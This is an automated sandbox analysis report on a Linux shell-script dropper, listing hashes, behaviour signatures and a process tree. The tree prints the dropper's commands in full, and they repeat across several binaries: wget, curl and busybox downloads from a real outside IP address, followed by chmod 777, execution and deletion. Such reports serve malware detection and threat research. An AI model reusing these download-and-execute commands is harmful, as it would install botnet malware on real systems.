Analysis
- max time kernel: 150s
- max time network: 154s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240226-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 21-11-2024 08:36
Static task
static1
Behavioral task
behavioral1
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-mipsel-20240226-en
General
- Target: d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
- Size: 10KB
- MD5: 8abf2434594ba2dffa54b25832749b54
- SHA1: 0e89289d57c7377b331a82fbfaca526ccd8bb78e
- SHA256: d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c
- SHA512: 02c0ada458d3f0b7d057957c42ac1ed0493daa06e48ff877c07a7120a3cd5a5e88dc2ba46a95cc6c2752b8f570c19a697220bc733f2c8653c42d770e7aa033a1
- SSDEEP: 96:KVh5RKWVHduuHsnbBWwwiDcO0UCn14IuuHsnbRWwwiDqOVvhkEy1n44h5RKWVRNs:KxL8a1DrE
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid / Process
- 733 chmod
- 853 chmod
- 770 chmod
- 841 chmod
- 847 chmod
- 871 chmod
- 877 chmod
- 889 chmod
- 925 chmod
- 937 chmod
- 955 chmod
- 726 chmod
- 806 chmod
- 859 chmod
- 883 chmod
- 895 chmod
- 901 chmod
- 913 chmod
- 919 chmod
- 931 chmod
- 943 chmod
- 742 chmod
- 799 chmod
- 865 chmod
- 907 chmod
- 949 chmod
Executes dropped EXE 26 IoCs
ioc / pid / Process
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 727 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 734 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 743 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 771 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
- /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW 800 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
- /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 808 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 842 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 848 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 854 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 860 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 866 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 872 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 878 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 884 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 890 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 896 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 902 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 908 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 914 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 920 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 926 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 932 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 938 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 944 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 950 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 956 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
Reads runtime system information
description / ioc / Process
- File opened for reading /proc/sys/crypto/fips_enabled curl (27 identical entries, one per curl process in the process tree)
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid / Process
- 802 wget
- 803 curl
- 804 busybox
- 808 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
- 811 rm
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description / ioc / Process
- File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl
- File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl
- File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl
- File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl
- File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl
- File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl
- File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl
- File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl
- File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl
- File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl
- File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl
- File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl
- File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl
- File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl
- File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl
- File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl
- File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl
- File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl
- File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl
- File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl
- File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl
- File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl
- File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ curl
- File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl
- File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl
- File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl
- File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl
Processes
- /tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh (PID:696): /tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
  - /bin/rm (PID:700): /bin/rm bins.sh
  - /usr/bin/wget (PID:704): wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  - /usr/bin/curl (PID:713): curl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:724): /bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  - /bin/chmod (PID:726): chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
    - File and Directory Permissions Modification
  - /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 (PID:727): ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
    - Executes dropped EXE
  - /bin/rm (PID:728): rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  - /usr/bin/wget (PID:730): wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  - /usr/bin/curl (PID:731): curl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:732): /bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  - /bin/chmod (PID:733): chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
    - File and Directory Permissions Modification
  - /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC (PID:734): ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
    - Executes dropped EXE
  - /bin/rm (PID:735): rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  - /usr/bin/wget (PID:736): wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  - /usr/bin/curl (PID:737): curl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:738): /bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  - /bin/chmod (PID:742): chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
    - File and Directory Permissions Modification
  - /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC (PID:743): ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
    - Executes dropped EXE
  - /bin/rm (PID:747): rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  - /usr/bin/wget (PID:748): wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  - /usr/bin/curl (PID:755): curl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:764): /bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  - /bin/chmod (PID:770): chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
    - File and Directory Permissions Modification
  - /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 (PID:771): ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
    - Executes dropped EXE
  - /bin/rm (PID:775): rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  - /usr/bin/wget (PID:777): wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  - /usr/bin/curl (PID:784): curl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:796): /bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  - /bin/chmod (PID:799): chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
    - File and Directory Permissions Modification
  - /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW (PID:800): ./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
    - Executes dropped EXE
  - /bin/rm (PID:801): rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  - /usr/bin/wget (PID:802): wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
    - System Network Configuration Discovery
  - /usr/bin/curl (PID:803): curl -O http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  - /bin/busybox (PID:804): /bin/busybox wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
    - System Network Configuration Discovery
  - /bin/chmod (PID:806): chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
    - File and Directory Permissions Modification
  - /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ (PID:808): ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
    - Executes dropped EXE
    - System Network Configuration Discovery
  - /bin/rm (PID:811): rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
    - System Network Configuration Discovery
  - /usr/bin/wget (PID:812): wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  - /usr/bin/curl (PID:839): curl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:840): /bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  - /bin/chmod (PID:841): chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
    - File and Directory Permissions Modification
  - /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 (PID:842): ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
    - Executes dropped EXE
  - /bin/rm (PID:843): rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  - /usr/bin/wget (PID:844): wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  - /usr/bin/curl (PID:845): curl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:846): /bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  - /bin/chmod (PID:847): chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
    - File and Directory Permissions Modification
  - /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 (PID:848): ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
    - Executes dropped EXE
  - /bin/rm (PID:849): rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  - /usr/bin/wget (PID:850): wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  - /usr/bin/curl (PID:851): curl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:852): /bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  - /bin/chmod (PID:853): chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
    - File and Directory Permissions Modification
  - /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci (PID:854): ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
    - Executes dropped EXE
  - /bin/rm (PID:855): rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  - /usr/bin/wget (PID:856): wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  - /usr/bin/curl (PID:857): curl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:858): /bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  - /bin/chmod (PID:859): chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
    - File and Directory Permissions Modification
  - /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 (PID:860): ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
    - Executes dropped EXE
  - /bin/rm (PID:861): rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  - /usr/bin/wget (PID:862): wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  - /usr/bin/curl (PID:863): curl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:864): /bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  - /bin/chmod (PID:865): chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
    - File and Directory Permissions Modification
  - /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX (PID:866): ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
    - Executes dropped EXE
  - /bin/rm (PID:867): rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  - /usr/bin/wget (PID:868): wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  - /usr/bin/curl (PID:869): curl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:870): /bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  - /bin/chmod (PID:871): chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
    - File and Directory Permissions Modification
  - /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ (PID:872): ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
    - Executes dropped EXE
  - /bin/rm (PID:873): rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  - /usr/bin/wget (PID:874): wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  - /usr/bin/curl (PID:875): curl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:876): /bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  - /bin/chmod (PID:877): chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
    - File and Directory Permissions Modification
  - /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil (PID:878): ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
    - Executes dropped EXE
  - /bin/rm (PID:879): rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  - /usr/bin/wget (PID:880): wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  - /usr/bin/curl (PID:881): curl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:882): /bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  - /bin/chmod (PID:883): chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
    - File and Directory Permissions Modification
  - /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff (PID:884): ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
    - Executes dropped EXE
  - /bin/rm (PID:885): rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  - /usr/bin/wget (PID:886): wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  - /usr/bin/curl (PID:887): curl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:888): /bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  - /bin/chmod (PID:889): chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
    - File and Directory Permissions Modification
  - /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 (PID:890): ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
    - Executes dropped EXE
  - /bin/rm (PID:891): rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  - /usr/bin/wget (PID:892): wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  - /usr/bin/curl (PID:893): curl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:894): /bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  - /bin/chmod (PID:895): chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
    - File and Directory Permissions Modification
  - /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 (PID:896): ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
    - Executes dropped EXE
  - /bin/rm (PID:897): rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  - /usr/bin/wget (PID:898): wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  - /usr/bin/curl (PID:899): curl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:900): /bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  - /bin/chmod (PID:901): chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
    - File and Directory Permissions Modification
  - /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci (PID:902): ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
    - Executes dropped EXE
  - /bin/rm (PID:903): rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  - /usr/bin/wget (PID:904): wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  - /usr/bin/curl (PID:905): curl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:906): /bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  - /bin/chmod (PID:907): chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
    - File and Directory Permissions Modification
  - /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 (PID:908): ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
    - Executes dropped EXE
  - /bin/rm (PID:909): rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  - /usr/bin/wget (PID:910): wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  - /usr/bin/curl (PID:911): curl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:912): /bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  - /bin/chmod (PID:913): chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
    - File and Directory Permissions Modification
  - /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX (PID:914): ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
    - Executes dropped EXE
  - /bin/rm (PID:915): rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  - /usr/bin/wget (PID:916): wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  - /usr/bin/curl (PID:917): curl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:918): /bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  - /bin/chmod (PID:919): chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
    - File and Directory Permissions Modification
  - /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ (PID:920): ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
    - Executes dropped EXE
  - /bin/rm (PID:921): rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  - /usr/bin/wget (PID:922): wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  - /usr/bin/curl (PID:923): curl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:924): /bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  - /bin/chmod (PID:925): chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
    - File and Directory Permissions Modification
  - /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil (PID:926): ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
    - Executes dropped EXE
  - /bin/rm (PID:927): rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  - /usr/bin/wget (PID:928): wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  - /usr/bin/curl (PID:929): curl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:930): /bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  - /bin/chmod (PID:931): chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
    - File and Directory Permissions Modification
  - /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff (PID:932): ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
    - Executes dropped EXE
  - /bin/rm (PID:933): rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  - /usr/bin/wget (PID:934): wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  - /usr/bin/curl (PID:935): curl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:936): /bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  - /bin/chmod (PID:937): chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
    - File and Directory Permissions Modification
  - /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 (PID:938): ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
